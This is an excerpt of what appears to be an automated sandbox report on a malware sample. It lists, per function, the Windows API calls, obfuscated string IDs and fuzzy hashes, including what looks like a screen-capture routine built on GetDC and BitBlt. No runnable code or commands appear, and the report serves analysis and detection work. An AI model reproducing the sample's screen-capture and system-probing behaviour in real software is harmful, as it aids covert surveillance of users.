                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a$h.^
                                                                                                                                                                                                                              • API String ID: 0-1614140178
                                                                                                                                                                                                                              • Opcode ID: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
                                                                                                                                                                                                                              • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                                                                                                                                                                              • API String ID: 237503144-816972838
                                                                                                                                                                                                                              • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                              • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                              • API String ID: 0-102253164
                                                                                                                                                                                                                              • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                              • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                              • API String ID: 0-102253164
                                                                                                                                                                                                                              • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                              • Instruction ID: e6ee7e29e04e2f4088a623108f4cffe6096857171e6e130f5721db87c7978ce2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93204B1940721CBCB24CF24C8927A6B7B2FF95318F29829DD8519F794E775A802CBD1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02148B0B
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02148B15
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02148BBC
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 02148BD1
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02148D1E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                              • String ID: 6W01
                                                                                                                                                                                                                              • API String ID: 4063528623-326071965
                                                                                                                                                                                                                              • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                              • Instruction ID: 53058cce596c2b960d48b9f20cc0fd135780f3c8a97297c6b91c6e0bcd7502dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C518B73A843040FD728AF648C45356BAC79BC1314F1BC1399989AB3E5EF7888068BC1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0040D555
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                              • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                              • API String ID: 3213364925-1959178137
                                                                                                                                                                                                                              • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                              • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: GetDC.USER32(00000000), ref: 02176BF0
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02176C11
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02176C21
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: DeleteObject.GDI32(00000000), ref: 02176C28
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: CreateCompatibleDC.GDI32(00000000), ref: 02176C37
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02176C42
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: SelectObject.GDI32(00000000,00000000), ref: 02176C4E
                                                                                                                                                                                                                                • Part of subcall function 02176BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02176C71
                                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 0214D7BC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                              • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                              • API String ID: 3248263802-1959178137
                                                                                                                                                                                                                              • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                              • Instruction ID: c6026aa0cf5ab3fd697e2ada15e75d036e6969d11c9e5871afebd265cdad33d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3B107756447818FE725CF2AC4E0762BBE2FF96304B18D1ACC4D68BB4AD738A446CB51
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                                                                                                                                                                              • API String ID: 0-3030200349
                                                                                                                                                                                                                              • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                              • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-1320392364
                                                                                                                                                                                                                              • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                              • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-1320392364
                                                                                                                                                                                                                              • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                              • Instruction ID: ca6a78add1494d02ff10c3e689c6ffba37c639704e500fd3c4c4c982cdf6c397
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C691196524C3818BD718CF39846537EFBD29FD6218F288A6DE4D6CB291D339C506C716
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                              • API String ID: 0-3770969982
                                                                                                                                                                                                                              • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                              • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: D`a&$NMNO$bX_^$h.^
                                                                                                                                                                                                                              • API String ID: 2994545307-2273293378
                                                                                                                                                                                                                              • Opcode ID: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
                                                                                                                                                                                                                              • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                              • API String ID: 0-3770969982
                                                                                                                                                                                                                              • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                              • Instruction ID: eea250ecb9e59199d059991afcd95e1b41e5192fd31ee133b270caa2b7daf1d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4971C0B554D3A58BD304DF12C8802AFBBE2FBD1314F188E6CE5D86B251C739854A8F86
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: B:$C@$K3$bX_^
                                                                                                                                                                                                                              • API String ID: 0-595269213
                                                                                                                                                                                                                              • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                              • Instruction ID: e07e4be46fc511bbd4eeabdb131af0df7fdaa4afeab70d3d22faf0b4dc46300f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B641CEB5D102689FDB20EF79CD867DDBFB1AB85300F4442AAE448A7295D7340E498FD2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: NP,?$h.^$UA
                                                                                                                                                                                                                              • API String ID: 0-2996329290
                                                                                                                                                                                                                              • Opcode ID: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                              • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^${wBy$?;;
                                                                                                                                                                                                                              • API String ID: 0-1036816154
                                                                                                                                                                                                                              • Opcode ID: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                              • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-2390459867
                                                                                                                                                                                                                              • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                              • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-2390459867
                                                                                                                                                                                                                              • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                              • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-2390459867
                                                                                                                                                                                                                              • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                              • Instruction ID: 4be70c68c5c3fe29177a8054df22c2f489e3e609d6d5e29a3d1c39b8872190ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6811A6524C3818BD718CF3994A537EFFD29FD6218F288A6DE4D28B281D339C506CB16
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-2390459867
                                                                                                                                                                                                                              • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                              • Instruction ID: a3cbad901d16b73b1fd4a4825beedb0c5fb27e49cbc0bb57a6fe141d43c3cf14
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A811A6524C3818BD719CF3984A537EFFD29FD6218F288A6DE4D28B281D339C506C716
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: #=0$Z$ut
                                                                                                                                                                                                                              • API String ID: 0-1971374411
                                                                                                                                                                                                                              • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                              • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
